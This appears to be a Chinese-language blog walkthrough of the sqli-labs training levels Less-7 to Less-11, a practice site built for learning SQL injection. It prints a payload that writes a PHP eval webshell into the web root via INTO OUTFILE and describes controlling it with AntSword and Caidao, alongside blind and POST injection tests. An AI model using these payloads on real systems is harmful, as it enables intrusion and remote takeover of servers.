Loading... # Sqli-labs4 导入导出相关操作 load_file(file_name) 读取文件并返回文件的内容作为一个字符串 into outfile导入到文件 ## Less-7 导出文件GET字符型注入 GET-Dump into outfile-String 我现在控制台尝试注入文件 ![image-20220129102957770.png](http://xherlock.top/usr/uploads/2022/01/1024419703.png) 发现权限不够,进入你使用的MySQL文件路径下的my.ini添加secure_file_priv="/"后,重启MySQL ![image-20220129103101548.png](http://xherlock.top/usr/uploads/2022/01/1179963958.png) 文件注入成功 ![image-20220129103228511.png](http://xherlock.top/usr/uploads/2022/01/3271650747.png) ![image-20220129103238628.png](http://xherlock.top/usr/uploads/2022/01/3985517055.png) 导入一句话php木马,这里获取绝对路径可以使用之前的关卡里获取 ![image-20220129105438694.png](http://xherlock.top/usr/uploads/2022/01/3485563021.png) ~~~ /?id=1')) union select 1,2,'<?php @eval($_post["pass"])?>' into outfile "F:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\xherlock.php"--+ ~~~ 成功 ![image-20220129103949863.png](http://xherlock.top/usr/uploads/2022/01/2704749354.png) 地址栏访问 ![image-20220129104015085.png](http://xherlock.top/usr/uploads/2022/01/1477968887.png) 使用中国蚁剑和菜刀结果发现都连不上,可无语,找了半天最后发现一句话木马里php语言对大小写敏感,不能用小写 ![image-20220129150812138.png](http://xherlock.top/usr/uploads/2022/01/1989592481.png) 获取了所有路径权限 ## Less-8 布尔型单引号GET盲注 GET-Blind-Boolian Based-Single Quotes ~~~ http://192.168.7.111/Less-8/?id=1' and 1=1--+ ~~~ 输入后发现正确(You are in……) 可以按照Less-5盲注或者时间延迟注入 ## Less-9 基于时间的GET单引号盲注 GET-Blind-Time based-Single Quotes 用时间延迟注入法 ## Less-10 基于时间的GET双引号盲注 GET-Blind-Time based-Double Quotes 换成双引号闭合即可,还用时间延迟注入 下面开始使用post法做题 ## Less-11 基于错误的POST单引号字符型注入 POST-Error Based-Single Quotes-String 我们输入dumb、dumb可以看到页面post了数据 ![image-20220129182911302.png](http://xherlock.top/usr/uploads/2022/01/2465996686.png) 这时候模仿get型注入,给用户名添加单引号,报如下错误 ![image-20220129183044125.png](http://xherlock.top/usr/uploads/2022/01/140543087.png) 我们先看下给的源码,可以看到给变量裹了一层单引号 ![image-20220129193007070.png](http://xherlock.top/usr/uploads/2022/01/224544466.png) 我们可以结合Less-1,对uname进行注入,将and之后的全注释掉 经过我坚持不懈的研究发现,**hackbar在这里这样使用** ![image-20220129215229399.png](http://xherlock.top/usr/uploads/2022/01/69565553.png) 红框这里必须将submit大小写交换 ![image-20220129215322963.png](http://xherlock.top/usr/uploads/2022/01/2506361701.png) 同时先点击页面中的submit按钮,再点击hackbar里的execute才可以执行post 可以看到,按照Less-1的payload即可爆出当前数据库下的所有表名 ![image-20220129215455226.png](http://xherlock.top/usr/uploads/2022/01/3294165676.png) 按照Less-1即可完成本题 最后修改:2022 年 01 月 29 日 © 允许规范转载 打赏 赞赏作者 支付宝微信 赞 0 如果觉得我的文章对你有用,请随意赞赏